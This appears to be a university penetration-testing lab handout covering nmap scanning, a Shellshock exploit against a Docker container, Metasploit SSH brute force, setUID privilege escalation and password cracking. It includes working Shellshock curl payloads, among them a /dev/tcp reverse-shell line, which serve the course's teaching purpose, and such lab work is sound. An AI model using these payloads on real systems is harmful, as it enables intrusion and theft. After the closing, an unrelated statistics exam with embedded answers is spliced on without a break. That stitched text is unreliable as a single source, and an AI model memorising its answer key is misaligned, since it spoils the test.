Table of Contents

Project 1: Introduction to Penetration Testing
Introduction
Learning Goals
Virtual Machine
Minimum Hardware to Run the Project 1 VM
Networks
  Networking in Docker
Environment Setup
Project Tasks (100 points)
  Setup
  Task 1: Network Scanning (10 points)
  Task 2: Exploit the Shellshock Vulnerability (20 points)
  Task 3: Brute Force with Metasploit (25 points)
Introduction to Metasploit
  Task 4: Privilege Escalation (20 points)
  Task 5: Password Cracking (25 points)
Background on Using John the Ripper
Task 5.0 Demonstration of John the Ripper – Not For Credit
  Extra Task 6 – Optional, Not for Credit
Task 6 Bypass Authentication with HTTP Request Smuggling
Deliverables
Reminders
Acknowledgments
Appendix 1 – Resources / Links
Appendix 2 – Running the VM on an ARM-based Mac
  Emulating x86/x64 on Apple MX Chipset
  Disclaimers
  Requirements
  Obtaining the Virtual Disk Image from the OVA
  Creating the Emulated Virtual Machine
  Configuring the Emulated Virtual Machine
  Completing Course Projects via SSH
  Obtaining the VM's IP address
  Completing Project 1 over SSH
Appendix 3 – VirtualBox Networking
  NAT Networking
  Bridged Networking
  Restarting VM Networking
  Forwarding Ports to Your Host
Appendix 4 – VM Troubleshooting
Closing

Summer 2025

Security Warning

This project involves port scanning and the programmatic creation of network attacks and other hacking techniques. Be certain that you always direct attacks at the Docker container ONLY. Accidentally scanning outside your local network could have serious consequences. The Docker network in the VM is 172.22.0.0/24 (CIDR notation); do not scan other networks!

Penetration testing is an important part of ensuring the security of a system. This project introduces some of the common tools used in penetration testing, while also exploring common vulnerabilities (such as Shellshock and setUID-bit exploits). In this project, you will gain hands-on experience by exploiting a server running inside a Docker container, hosted within a virtual machine (VM).
You will better understand the Shellshock vulnerability, how privilege escalation can occur, and how to crack weak passwords, all crucial elements of penetration testing.

On September 24, 2014, a severe vulnerability in Bash, nicknamed Shellshock, was identified. This vulnerability could be used to exploit many systems at the time. In this project, you will gain a better understanding of the Shellshock vulnerability by exploiting it to attack a machine. The objective of this project is to get first-hand experience with this interesting attack, understand how it works, and think about the lessons we can take away from it.

There are Tasks centering on the use of Metasploit and on getting a privileged shell on the Docker container. There is also a new optional task, Task 6 (HTTP Request Smuggling), that we hope students will try, but it is not part of the graded project.

In this project, you will:

For this semester's project we are releasing a new virtual machine (VM). It is x86-based, using Xubuntu 24.04, which uses the Xfce user interface. This is done to require less processing power than the GNOME-based full Ubuntu release for graphical user interface (GUI) users. One GUI note about Xfce: the lower corners of windows are hard to grab for diagonal resizing. It is much easier to grab and drag the upper corners of windows.

We expect some people to run the VM on older CPUs. There is no hard line for the minimum specification; these are guidelines, and your experience may vary:

If you are trying to use our x86-based VM under emulation on an ARM-based Mac, then you should NOT expect to be able to use the Xfce-based GUI environment. It might work, but it will be very slow. Instead, ARM-based VM users will use ssh to access the services needed on the VM. We only provide limited support here; Apple M-series Macs are not a supported platform for CS 6262. Please see Appendix 2 for instructions on how to attempt to make this work on an ARM-based Mac.

For your convenience we have opened port 22 on the VM. The VM runs the OpenSSH server. In VirtualBox, you can set up port forwarding; see Appendix 3 for information. Once you forward the VM's port 22 to your chosen port on your host, you can simply use ssh -p chosen_port_number penteststudent@localhost to log in to the VM from your host.

Because we have opened the ssh port on the VM, the VM is only as secure as your network. In theory, your typical home network has a router that uses Network Address Translation and blocks unsolicited incoming connections from the outside world. This means, in theory, assuming that your router isn't hacked, attackers on the Internet can try to attack your router's WAN IP address, but the router will rebuff any connection that didn't originate inside your network. Also in theory, your ISP does something to block these attacks, but some will get through. The minute you open a port on your router for your favorite game, you have opened a can of worms. We strongly recommend you turn port forwarding on your router OFF while working on this project. Having said that, we also recommend you keep it off all the time.

Consider where the instructions tell you to access the vulnerable website at the target IP address and vulnerable target port. In the VM you would enter the IP address of the Docker container and the port number together into the browser. Instead, if you are logged in from your host, you have to consider which networking style you are using in VirtualBox (or your virtualization software of choice).
You may need to use Bridged networking, see Appendix 3.Once you set up forwarding, the vulnerable web server port is available on the port you choose on your host. The IP address will be different. We forward the target webserver port on the Docker container to the VM itself. Thus, it’s possible to use the VM’s localhost address followed by the target port number to access the vulnerable website like: http://localhost:9999.See Appendix 3 for more information about two popular VirtualBox networking styles and other VirtualBox information.Relative to the Docker network, remember that the VM has one network interface that talks to your host, and another interface to talk on the Docker network. You’ll see more about this in the details of Task 2. The Docker network is 172.22.0.0/24 on this VM. Google CIDR (related to networking) if this notation doesn’t make sense to you, it’s CIDR notation to denote a network with 254 nodes. The VM Docker interface and the Docker container both live in this network address range.Here we repeat our warning to only use nmap or zenmap on the Docker network! You will be provided a virtual machine (VM) based on Xubuntu 24.04 Linux, preinstalled with necessary tools like Metasploit and John the Ripper. Inside this VM, a Docker container will run, it has various vulnerabilities that you will attack.Provided Files: Steps:./StartShockServer.shNote: Once you start the Docker container, it will restart itself if it dies, unless you run the ./StopShockServer.sh script. The first step in any penetration test is to gather information about the network and servers you’ll be exploiting. In this task, you will perform network scanning and answer a few questions based on your findings. On startup, the shellshockvulnerable container in the VM runs a webserver and listens to multiple ports for incoming messages. It also runs a ssh server.In the VM logged in as penteststudent, open a Terminal Emulator window.First, before doing anything else, run the command to start up the Docker container that runs the vulnerable services:You should see a message after a few moments that the container has started. While it’s not strictly necessary, when you are shutting down or rebooting the VM, you can run the shutdown command first:./StopShockServer.sh Now, let’s investigate the network. At the command prompt, enter this command:You will see the output pictured in Figure 1.In the output you will see various network interfaces. The important ones are:lo — this is the loopback interface, it refers to the VM itself. It’s the same, effectively, as 0.0.0.0 and 127.0.0.1 (with minor differences).enp0s3 — this is the VM interface with your host. If you are trying to ssh into your VM from your host computer, you use this address. You may need Bridged networking for this, see Appendix 2. For Ubuntu24.04, enp0s3 always seems to be the name chosen for the first interface, instead of the traditional eth0.docker0 — this is the default Docker network on 172.17.0.0/24, we will not be using it.br-a795c89aa411 — this is an important interface, it’s the VM’s interface on the Docker network. From this entry you can see the Docker network is 172.22.0.0/24, note this address as it will come in handy for the next steps. It’s possible the interface will use a different br-xxxx ID, though we wouldn’t expect it to. Here you can see the VM’s Docker address is 172.22.0.1. 
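Once the container is running, a minimal discovery workflow with nmap might look like the following sketch. The container address in the second command is only a placeholder; substitute whatever the first scan reports, and remember to scan only the 172.22.0.0/24 Docker network.

nmap -sn 172.22.0.0/24
nmap -sV -p 1-10000 172.22.0.2

The -sn option does host discovery without a port scan, and -sV asks nmap to identify the service listening on each open port it finds.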
Figure 1 – Output of the ip a command, showing the properties of the different network interfaces

There is also (when the container is running) a veth-xxxx interface. This is the virtual Ethernet interface for the running Docker container. While you could use the IPv6 address you see in the output, for this project you should use IPv4 exclusively; don't use IPv6 addressing.

Now it's time to get down to the tasks:

Find the IP address of the vulnerable Docker container on the Docker network using nmap or zenmap (the GUI version of nmap). You'll find both installed in the VM; ignore any GTK errors if you run zenmap from the command line. Remember to limit your scans to the 172.22.0.0/24 network and nodes on that network only! Don't scan outside the Docker network!

IMPORTANT: For people who are logging into the VM using ssh to do their work, we have forwarded ports from the Docker container to the VM so you can complete the port forwarding in VirtualBox on your host. You will see ports exposed on 172.22.0.1, the VM. These simply reflect the ports on the actual Docker container, so you can ignore ports on this address when answering questions in assignment_questionnaire.txt.

NOTE: You have zenmap on the GUI menu to use; it's more intuitive than the command-line version. It will complain that it's not run as root; that's OK.

Use an Intense scan in zenmap to identify all the open ports on the Docker container's webserver, and submit the port numbers which handle HTTP traffic to the Apache web server and the Python web server on the VM. You can determine the server type in zenmap, and with nmap on the command line with the correct options. While zenmap scans all ports, nmap by default only scans the top 1000 ports; to scan EVERY port from 1-10000, you need to specify -p 1-10000 in the nmap command. All the ports you're looking for are lower than port 10000.

One suggested workflow for zenmap is to do a "quick scan" of the 172.22.0.0/24 network to identify nodes on the network, then inspect interesting nodes more closely with further, more intense scans. If you are scanning and not finding web server ports, did you remember to run ./StartShockServer.sh in your home directory?

Submit in assignment_questionnaire.txt:

In this task, you will launch the Shellshock attack on a remote web server. Many web servers enable the Common Gateway Interface (CGI), which is an older method used to generate dynamic content on Web pages and Web applications. Many CGI programs are written as shell scripts. Therefore, before a CGI program is executed, the shell program will be invoked first. This can be triggered by a user from a remote computer, typically using the curl command.

To access this CGI program on the Docker container from the VM browser or command line, you need to first make sure you started the Docker container using ./StartShockServer.sh. Then, you can either use a browser by typing the following URL: http://<container IP>:<port>/cgi-bin/shellshock.cgi or use the command-line program curl to do the same thing.

For this task, your goal is to launch the attack through this URL with the proper parameters, such that you can achieve something that you cannot do as a normal remote user. You will get a shell directly on the container, without using ssh to log in or even knowing a password!
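As a sketch of what such a request can look like: the web server passes request headers such as User-Agent to the CGI script as environment variables, and a vulnerable Bash executes whatever code is appended to a function definition found in such a variable. The IP address and port below are placeholders for the values you found in Task 1, and the commands run are only examples.

curl -A "() { :;}; echo Content-Type: text/plain; echo; /bin/cat /etc/passwd" http://172.22.0.2:9999/cgi-bin/shellshock.cgi

One common way to turn this into an interactive shell is to listen on the VM (172.22.0.1 is the VM's address on the Docker network; port 4444 is arbitrary) and have the payload connect back:

nc -lvnp 4444
curl -A "() { :;}; /bin/bash -i >& /dev/tcp/172.22.0.1/4444 0>&1" http://172.22.0.2:9999/cgi-bin/shellshock.cgi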
For example, once you have a shell, you can directly execute a file on the container or look up information about files located on the container.When you successfully launch an attack, please execute the /bin/task2 program (which needs your GT username as the input) inside the VM. It will generate the submission hash for you.For students that want to verify their work, here’s an example correct input/output for running /usr/bin/task2:$ /usr/bin/task2 gburdell3 Here is your task2 hash: Submit in assignment_questionnaire.txt:While you’re in a shell and able to inspect the file system, look around /usr/bin for files that start with “task.” Run a ls -l on /usr/bin/ and get familiar with the variety of programs found there. One of them is important for Task 4!NOTE: Keep your shell open for part of Task 3, you need to search the filesystem for two files needed for Task 3. Now that you have established a foothold on the server through Shellshock, you’ve discovered that the /usr/bin/task3 executable is owned by a different user account that has enhanced privileges. To execute this file and complete the challenge, you’ll need to gain access to that user’s account.During a penetration test, weak credentials remain one of the most common vulnerabilities found in systems. Attackers often exploit this by attempting to authenticate using common username and password combinations. That’s where Metasploit’s brute force capabilities come in.Metasploit includes powerful auxiliary modules for password attacks, along with extensive wordlists of commonly used usernames and passwords. For this project, we’re going to use Metasploit’s SSH brute force module to identify weak credentials on the Docker container. This will demonstrate how penetration testers systematically identify accounts with poor password hygiene.Metasploit works by automating login attempts against the SSH service, trying different username and password combinations from predefined wordlists. This is a critical skill for penetration testers, as password spraying and credential stuffing attacks are frequently used in real-world scenarios.This approach teaches students about:After a moment, the Metasploit Framework console (msfconsole) will load. For this project, msfconsole is the main way of accessing Metasploit. While there are other tools and command prompts associated with Metasploit, msfconsole is suitable for the related tasks of this project. It may take a little time for Metasploit to load, you are ready when you see the msf6 prompt at the bottom: Figure 2 – Metasploit opening screenThe text-art image will likely be different. You can ignore the warning about Metasploit being more than two weeks old. Wait a minute for the msf6 > prompt before entering commands. (in msfconsole): Figure 3 – Shows 752 results for search scanner command The reason there are so many results is that “scanner” is a class ofauxiliary modules (as seen by there being so many modules beginning with “auxiliary/scanner”). So, searching for “scanner” (or “scan”) will give everything at all related to network or vulnerability scanning. Figure 4 – Narrowed down results for grep portscan search scanner command That seems a little better. Only 7 results. Since we’re scanning for open tcp ports, let’s use: “auxiliary/scanner/portscan/tcp”. 
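The next paragraphs walk through this module step by step; condensed, the whole sequence inside msfconsole looks roughly like the sketch below. The RHOSTS value is a placeholder for the container address you found in Task 1.

use auxiliary/scanner/portscan/tcp
options
set RHOSTS 172.22.0.2
run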
To use this metasploit module, you should run the command: You will get this response: Figure 5 – Shows the new prompt with scanner/portscan/tcpYou now see “auxiliary(scanner/portscan/tcp)” after the prompt, indicating you are using the auxiliary(scanner/portscan/tcp) module. Figure 6 – Viewing options such as RHOSTS While each of the options is marked as required, most of the prefilled values work for our purposes. The only one we need to change is RHOSTS. RHOSTS should be the IP address of the host we want to scan. In this case, you should set it to the IP address of the Docker container, that you found in part 1. You can use the command: Now try running options again and ensure the RHOSTS option is set to the correct IP address for the Docker container. Now you’ve seen an example of how to use Metasploit. You’ll follow a similar process when exploiting the vulnerability to run /bin/task3. Make note of the ssh server port found, if you didn’t note it during Task 1. Task 3 Assignment: Normally you would allow some amount of time waiting for the ssh attack to complete, as the attack will try every combination of usernames and passwords in the username and password files. For convenience we have set up these files to finish very quickly, you won’t have to wait long to get in. NOTE: You should keep the reverse shell running after finishing Task 3, as you will need it in Task 4. Submit: Your goal in Task 4 is to upgrade the privilege for your command shell by exploiting a setUID vulnerability. You will run /bin/task4 with a higher effective user id (euid), not the default user “www-data”. To be clear, you will still see the www-data user and group, but when you run the id command, you will also see an “euid” (effective user id) of 0. You will learn about various commands in Linux and find one that lets you escalate your privileges.Assignments: NOTE: Remember to keep the shell open from the previous task, or recreate the steps needed to get the shell in Metasploit. As a first step, type id in your shell. You should see system_admin which is your user ID. Now, run /usr/bin/task4 gt_username. You will see a permission denied error. That is because /usr/bin/task4 is configured to allow only a privileged user to run it. Thus, you need to find a way to run /bin/task4 as a privileged user. A feasible approach is to spawn a shell running as the “root” user and run task4 through it. Useful Resource: https://gtfobins.github.io/ You may want to look at the output of ls -l /usr/bin for a program which has a higher privilege than the default user and run /bin/task4 gt_username in the shell spawned. Also look at the commands featured on the link above. Please leave your answers in assignment_questionnaire.txt. NOTE: Keep your Task 4 root shell open for Task 5.A valuable part of any penetration test is password cracking. While there may be no known vulnerabilities in a system, a weak password could be just as damaging in allowing an attacker to gain access to a system or view sensitive information once they gain access. We’re going to look at two kinds of weak passwords in this task: passwords that are too short, and passwords that can easily be guessed via password scraping.Remember you have learned about the Linux find command. On the container, there are two password-protected files. task51.zip is password-protected with zip, while task52.gpg is encrypted with gpg, a common file encryption tool inLinux. GPG is the open-source version of PGP – Symantec owns PGP. 
It is typically licensed for a fee.

We already know the developers of this web server are not very security savvy, since they let a Shellshock vulnerability plus a setUID exploit give up a high-privilege shell on their machine. So, chances are they did not pick very secure passwords for these secret files. Your goal in this task is to crack the passwords of these two files using John the Ripper (a popular password cracker) and cewl (a password scraper).

That hash is:

Username: myuser
Password: password12
Format: MD5-Crypt (--format=md5crypt)

john --format=md5crypt --wordlist=/home/penteststudent/rockyou.txt hello.hash

Note that there is no space between -- and wordlist. You will see this output:

Cracked 1 password hash

john --show hello.hash

The output is:

In this task, you will analyze two password-protected files suspected of containing sensitive content:

These files have been encrypted using weak or guessable passwords. Your job is to recover these passwords using password cracking techniques and tools. To prepare for these tasks, you need to download the files from the Docker container to your VM so you can work on them with the John the Ripper tools. Remember you are using your login from Tasks 3 and 4; this is a Metasploit shell. Once you download the files from the Docker container, be sure to switch to a VM Terminal where you're not logged into the container anymore. You do the rest of Task 5 on your VM, not in the Docker environment.

You'll work with:

This task reinforces your ability to:

Hint: This will produce a hash line John can use as input.
Hint: Try using --incremental to perform a brute-force attack.
Hint: Use the unzip command and supply the recovered password.
Record the output hash in your assignment questionnaire.
Hint: Pay attention to how long this process takes and whether it seems productive.
Ask yourself:
Hint: You may need to configure cewl to follow links to profile pages.
Hint: Use the --wordlist option and allow the default --rules to permute the words.
This command is one line; substitute your cracked password.
Record the resulting hash in your assignment questionnaire.

In your assignment_questionnaire.txt, include:

We have a new task you can help us test. If you are enjoying attacking the Docker container so far, then you can continue the fun with this task. We would appreciate any feedback on this task for when we incorporate it into the project in future semesters.

We're not 100% sure we have the HTTP Request Smuggling vulnerability set up correctly, but you can spend some time researching the weakness. We are running vulnerable Apache2 version 2.4.32.

UPDATE: Hold off working on this unless you want to hack at it; based on student input I don't think I have a vulnerable version of the Apache2 server on it. I will produce a new VM with the correct server version soon, thanks for your patience.

In late 2024 a new Common Vulnerability and Exposure (CVE-2024-40725) came out for the Apache2 web server. The Apache2 server sees widespread use: as of summer 2025, Apache reportedly had a 15-20% share of the server market. Nginx was the leader, Apache second, Cloudflare Server third, and LiteSpeed server fourth. Often these different servers are used in combination, with nginx acting as a front end (reverse proxy) for back-end servers that run on Apache2. In this project Apache not only serves up a site directly, it's also a reverse proxy for a Python web server.
The Python back-end server is configured with these routes:

HTTP Request Smuggling is a critical web security vulnerability that occurs when front-end and back-end servers interpret HTTP requests differently. This can allow attackers to bypass security controls and access protected resources. The Python webserver has a protected administrative area at /protected that requires authentication. Your goal is to bypass this authentication and access the protected resource to retrieve your personalized flag.

Submit to Gradescope:

Important:

That's it, you're done with Project 1!

This project is adapted from SEED Labs by Wenliang Du, licensed under the GNU Free Documentation License, Version 1.2.

Here are some resources for the various concepts and tools presented in the project:

nmap – https://nmap.org/book/man.html#man-description
zenmap – https://nmap.org/zenmap/

Task 3 – Metasploit
https://docs.rapid7.com/metasploit/bruteforce-attacks/
https://www.offsec.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/

Task 4 – Root Privilege Escalation
Getting a root shell – https://gtfobins.github.io/ (compare this list to the output of ls -l /usr/bin on the Docker container, once you already have a regular shell. Note that find /usr/bin -perm 4000 matches only files whose mode is exactly 4000; to find any file with the setUID bit set, use find /usr/bin -perm -4000 instead.)

Task 6 – HTTP Request Smuggling
https://portswigger.net/web-security/request-smuggling
https://www.imperva.com/learn/application-security/http-request-smuggling/
https://nvd.nist.gov/vuln/detail/cve-2024-40725
https://httpd.apache.org/security/vulnerabilities_24.html

General links:
Shellshock – https://en.wikipedia.org/wiki/Shellshock_(software_bug)
Metasploit – https://www.offensive-security.com/metasploit-unleashed/
John the Ripper – https://www.openwall.com/john/doc/
CeWL – https://tools.kali.org/password-attacks/cewl
Webserver Marketshare – https://w3techs.com/technologies/overview/web_server

VM Download link: Will be posted on Canvas on the Machine Learning project when we release it.

Emulation on ARM-based Macs doesn't always work, and it can be very slow. You should use ssh to access the VM, using your host's tools like Terminal, curl, and your browser if needed. Credit where credit is due: TA Eric Johnson wrote these instructions, and we modified them for CS 6262 students for Project 1. We decided to provide some details below on how to configure emulation, but these instructions come without any warranty – we cannot grant extensions due to emulation issues.

SHA256:

Note: None of the material below is necessary for running in VirtualBox on an Intel-based machine, but you can run the VM headless using the same SSH instructions as below:

While it is possible to use emulation to run the CS6262 VMs, it is important to note that it is not officially supported. You will need to be familiar with SSH and using the terminal, as the Linux GUI is not very responsive. You will find it difficult to impossible to finish the project using the VM GUI. Please understand the teaching assistants (TAs) can provide only very limited support on emulation. You will NOT receive extensions due to technical difficulties with the VM. Using emulation to complete the homework for the class is done at your own risk.

Homebrew (QEMU) — https://www.qemu.org/download/#macos
UTM — https://mac.getutm.app
or any other emulation tool

For the purposes of this tutorial we will use CS6262Project1-R01.ova as the VM filename; be sure to adjust the instructions for your VM image name.
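The extraction step itself was omitted above; as a sketch, an OVA file is simply a tar archive of the OVF package, so something like the following unpacks it (using the example filename above):

tar -xvf CS6262Project1-R01.ova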
Note that these instructions were created using a Linux VM, and the exact commands may vary slightly on macOS. This will result in this file being created:

CS6262Project1VM-disk002.vmdk

qemu-img convert -O qcow2 CS6262Project1VM-disk002.vmdk CS6262Project1VM-disk002.qcow2

Note these instructions assume that you are using UTM. The instructions will differ if you are not using UTM. The VM settings window should have opened once you saved the VM. Now you'll need to configure the VM to use your .qcow2 image to boot the course VM.

Given that emulating the Linux UI typically results in a poor user experience, the expectation is that you will use SSH to complete all project activities. If you are unable to use SSH to perform a specific task, then you're unlikely to be able to complete the project using an emulated VM.

Note that it is likely the second interface, denoted by `2:`. The default subnet for UTM is typically `192.168.64.0/24`:

2: enp0s1: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether ee:50:4e:d3:b0:d1 brd ff:ff:ff:ff:ff:ff
    inet 192.168.64.12/24 brd 192.168.64.255 scope global dynamic noprefixroute enp0s1

In this example, we will assume that the IP address for the course VM is 192.168.64.12. Your IP address may vary. Please use the address identified above to complete each SSH command. Ensure that you have Chrome installed on your Mac.

Connect to the VM via ssh:

ssh penteststudent@192.168.64.12

This will get you a bash session running on the VM, presented in your host interface. For portions of the project that can be done from the command line (all of it), use this window. You may want to open a second window for certain types of attacks, though it isn't required.

If you want to view the project website, then you need port forwarding. You can possibly set this up in UTM/QEMU; the author isn't sure. You can also use SSH tunneling to forward the vulnerable website to view from your host:

ssh -L 127.0.0.1:9999:127.0.0.1:9999 penteststudent@192.168.64.12

(Note that port 9999 is just an example; use the port you discover with nmap/zenmap.)

We hope you have been able to work your way through these instructions; please let us know of any suggested changes on Ed Discussion.

If you look at the networking settings in VirtualBox, you'll see various network styles available. We will look at two of those here: NAT and Bridged.

Figure 7 – Network Types in VirtualBox

In VirtualBox NAT networking, the VM accesses the Internet through a software-based router created by VirtualBox. This is the simplest and default method of networking in VirtualBox. The VM has Internet access, but you typically can't access the VM from your host. The IP address for the VM will be in the range 10.0.2.0/24. This networking style is fine if you plan to do all your work in the VirtualBox VM's GUI. You will be able to work in a shell in the VM and will have full network access from within the VM to the Docker container running in the VM. From the VM you'll also be able to access the Internet. This is the safest networking style in VirtualBox, as the VM is not accessible from the network.

For those who want to be able to ssh into the VM from their host machine, you'll want to choose Bridged networking in the VM. This promotes the VM to be a full member of your network. This means instead of a 10.0.2.0/24 address, your VM will get an address on your home network.
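As a quick sketch of what that looks like in practice (the 192.168.1.50 address is only an example; use whatever ip a reports for enp0s3 inside your VM):

ip a show enp0s3
ssh penteststudent@192.168.1.50

The first command is run inside the VM to find its bridged address; the second is run from your host on the same network.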
We do not recommend Bridged networking if you are in a work environment or on an otherwise untrusted or externally exposed network.

Once you switch to Bridged networking, you should see the IP address of the VM change to an address on your network, which is typically in the range 192.168.1.0/24 on a home router. We have seen behavior in VirtualBox where, when you switch between NAT and Bridged networking, the IP address of the VM does not update. In this case, please run the following command in penteststudent's home directory:

./RestartNetworking.sh

This runs the following commands:

You can't normally run these commands as penteststudent, so use the provided script to update your networking on the VM.

We might be giving away the game a bit here, but it's OK. As we have noted, the Docker network is on 172.22.0.0/24. It's easy enough to run ip a and discover the VM's IP address is 172.22.0.1. As noted previously, you will see the Docker container's ports duplicated on the VM. This is to make them available for port forwarding to your host if you desire to work from your host.

To set up port forwarding, open the VM's Network settings. You can change network settings while the VM is running.

Figure 8 – Choose the Network Option

This only works if you're in NAT networking: you will see a Port Forwarding button in the VM's Networking settings. Click this button and you'll see the Port Forwarding Rules dialog appear. Click the + icon to create a new rule; under Host Port enter the port you want to use on your host, and under Guest Port enter the port number the VM's Docker container is using. If you're already running something on port 22, for example you run Windows Subsystem for Linux (WSL), then use a different port on the host side. The VM's ssh is set up on port 22. This will make the designated ports available on your host's localhost interface.

You can then run a command like this to ssh into the VM, per the settings above (substitute the host port you chose):

ssh -p <host port> penteststudent@localhost

You can also access the Docker container's published ports from localhost. Let's say you found the Apache2 server on the container on port 9999. Then you could use this command from your host to access the webpage with curl or a browser:

curl http://localhost:9999

This VM was produced on a Windows machine. If you are on an Intel-based Mac, you may see an error like this when starting the VM:

In this example we are using a Bridged network; regardless of whether you use NAT or Bridged, to fix this problem choose your eth0 interface in the Network Settings. If you can select the adapter type (if it's not greyed out like here), try different adapters, starting with the Intel desktop adapters.

Thanks for going through the project. We hope you see by now that, while this is a long document, most of it is introductory and background information. We would appreciate any feedback, positive or negative, about our choice to include so much extra information about Docker, networks, and VMs in this document. Did you find it helpful? Was the size of the document so large that it initially discouraged you? Thanks for any feedback; please use the Document Feedback post on Ed to make your comments.

Thank you!
Write your name and section number at the top right of this page: Class Section Number Bret 8:50 001 Sahifa 1:20 003 Miranda 9:55 004 Sahifa 3:30 005 Sahifa 8:50 006 Cameron 1:20 007 As you complete the exam, write your initials at the top right of each other page.If you need more room, there is a blank page at the end of the exam, or we can give you some scratch paper. Some multiple choice questions are “Select ONE” while others are “Select ALL that apply”. Pay attention to the question type and only mark one option if it says “Select ONE”. Fill in the circles completely. 1. A dataframe lions has 32 rows, each representing a unique lion. It has two numeric columns: age , each lion’s age in decimal years, and proportion.black , the percentage of that lion’s nose which is black. Finally, it has a logical column adult , which is TRUE if age is greater than 3 and FALSE otherwise. Consider the following code which attempts to make a scatter plot of age on the X axis vs. proportion.black on the y axis.Which of the following statements are true about errors in the above code? Select ALL that apply. fill = adult must be changed to color = adult to color the points differently. alpha = 0.5 must be moved outside of aes() , like size = 2 currently is. size = 2 must be moved within aes() , like alpha = 0.5 is. fill = adult must be moved to the aes() in the ggplot() call, not geom point() . 2. Using the same dataframe as Question 1, consider the following code which creates a new dataframe, lions summary .Which of the following statements are true about lions summary ? Select ALL that apply. lions summary has 2 rows. lions summary has 2 columns. (False: adult, averageAge, and averagePropBlack.) lions summary has a column called ‘adult‘. If there were any NA values in the age column of lions , all the values of averageAge in lions summary will be NA (Sneakily false: If there are only NA values in one category of adult, the other can still function!) 3. A random viewer’s ideal movie length, in minutes, is approximately X ∼ N(120,15). Actual movie lengths are given by Y ∼ N(143,19). (a) Which R code below calculates the probability that a random movie is shorter than the 40th percentile for ideal movie length? Select ONE. qnorm(0.4, 120, 15) %>% pnorm(143, 19) qnorm(0.4, 143, 19) %>% pnorm(120, 15) pnorm(0.4, 120, 15) %>% qnorm(143, 19) pnorm(0.4, 143, 19) %>% qnorm(120, 15) (b) What movie length y corresponds to a z-score of 1? Select ONE. 19143 124162 (143 + 19 = 162) 4. Your friend claims that a random variable, X, follows the following probability distribution:Which of the following are true about your friend’s claim? Select ONE. This distribution has negative values of x, therefore X is not a random variable. This distribution has negative values of P(X = x), therefore X is not a random variable. The area under this distribution is not 1, therefore X is not a random variable. X is a valid random variable. 5. Consider ordering a ”footlong” (12 inch) sub from Subway. Consider trying to estimate µ, the average length of the sub you receive when you order a 12 inch sub. You do this by ordering 40 footlong subs and measuring their lengths in inches. (What a great problem this is.) You observe that the average length of your 40 subs is 11.5 inches, and the standard deviation of their lengths is 0.4 inches. Consider testing H0 : µ = 12 vs. Hα : µ < 12. Write a numeric expression (only containing numbers and artihmetic symbols like + and ×) for the test statistic of this test. x¯ − µnull √ sx/ n Answer:6. 
The fictitious distribution of the number of children in a household (X) is given below. x 0 1 2 3 P(X = x) ? 0.4 0.25 0.15 (a) Which of the following statements about X is true? Select ONE. X is a discrete RV. X is a binomial RV. X is a continuous RV. X is a normal RV. (b) What value of P(X = 0) makes this a valid probability distribution? Select ONE. 0.1 0.15 0.2 0.25 (c) What is the median number of children per household? Select ONE. 0 1 2 Not enough infomration to determine 7. Data is collected on the duration each winter that a lake’s surface is frozen over a period of 103 consecutive years. The correlation coefficient between the variables is r = −0.4. The year variable has a mean ¯x = 1950 and a standard deviation sx = 30. The freeze duration variable has ¯y = 90 and a standard deviation sy = 17. Consider fitting a simple linear regression model to this data. Write a numerical expression (using only numbers and arithmetic symbols like + or ×) for the predicted freeze duration in the year 1890. No need to simplify. Answer: (1890 is two x standard deviations BELOW the mean of x, so our predicted value will be r * two y standard deviations below the mean of y.)* 90 + (−0.4) × (−2) × 17 *You could also take the long way:* and βˆ0 = 90 − βˆ1 ∗ 1950, so ˆy1 = βˆ0 + βˆ1 ∗ 1890 8. We continue to consider the lake freezing data from Problem 7. A 95% confidence interval for the freeze duration of the true regression line at x = 1890 has the form: yˆ1 ± c × SEC A 95% prediction interval for the duration that the lake was frozen in the single year 1890 has the form yˆ1 ± c × SEP where c is a critical value from some distribution and SEC, SEP are some positive values. Reminder: There are 103 years in the dataset. Which R code calculates the numeric critical value c? Select ONE. qnorm(0.95) qnorm(0.975) qt(0.95, 101) qt(0.975, 101) qt(0.95, 102) qt(0.975, 102) 9. Using the expressions from the previous problem, circle the true relationship between SEC and SEP and briefly explain why. SEC < SEP SEC = SEP SEC > SEP Answer: A confidence interval for the height of the regression line is narrower than a prediction interval for at the same x point; but they have the same center and critical value. Therefore, it must be that SEC < SEP. 10. Consider trying to estimate the proportion of UW-Madison undergraduate students who will graduate at the end of this semester, p. You ask 50 random students, and 7 of them will graduate at the end of the semester. Consider using this information to calculate a confidence interval for p. Which of the following statements are true? Select ALL that apply. If we were to calculate an Agresti-Coull confidence interval for p, its center would be (7 + 1)/(50 + 2). (False: It would be (7 + 2)/(50 + 4).) If we were to calculate a Wald confidence interval p, its center would be 7/50. The upper bound of the Agresti-Coull confidence interval would be greater than the upper bound of the Wald confidence interval. (it’s shifted towards 0.5) As we increase the confidence level of our interval towards 100%, our interval would widen and approach [0, 1]. 11. We are interested in comparing the proportions of individuals with bachelor degrees among of adult men aged 25 and older in the states of Minnesota and Wisconsin. Let pM and pW represent these two population proportions. In random samples of nM = 300 Minnesota men and nW = 400 Wisconsin men aged 25 and older, the numbers of individuals with bachelor degrees are xM = 90 and xW = 100. 
Without simplification, write a numerical expression using provided data for the standard error SEci used in a 95% confidence interval for pM − pW of the form (point estimate) ± zcrit × SEci when using the Agresti-Coull method. Answer: SEci 12. In the setting of the problem above, write a numerical expression using provided data for the standard error SEht of the test statistic Z: pˆM − pˆW Z = ∼ N(0,1) SEht Answer: SEht 13. Suppose that the test statistic from the previous problem has the value z = 1.47 and that the p-value from a two-sided test is 0.14. Which of the following statements are true? Select ALL that apply. The test is statistically significant at an α = 0.05 level. A 95% confidence interval for pM − pW will contain the value 0. ( insignificant p-value) 14. You ask a group of 30 people from Country A to each privately give you a random number between 1 and 1000. You then ask a group of 40 people from Country B to each privately give you a random number between 1 and 1000. Let µA be the true average value that all members of country A would give upon this request, and similarly for µB. You are interested in the quantity µA − µB. Which of the following statements are true about how to approach this problem through statistical inference? Select ONE. Two-sample means inference is impossible to conduct because the sample sizes are different. Two-sample means inference is impossible to conduct because the random variables are technically discrete. Two-sample inference is more appropriate than paired-sample inference in this case. Paired-sample inference is more appropriate than two-sample inference in this case. 15. Assume the correct value of the test statistic from problem 14 is -50. Which R code correctly calculates the p-value for this test? Select ONE. pt(-50, df = W) 2*pt(-50, df = W) 2*pt(abs(-50), df = W) 1 – pt(-50, df = W)
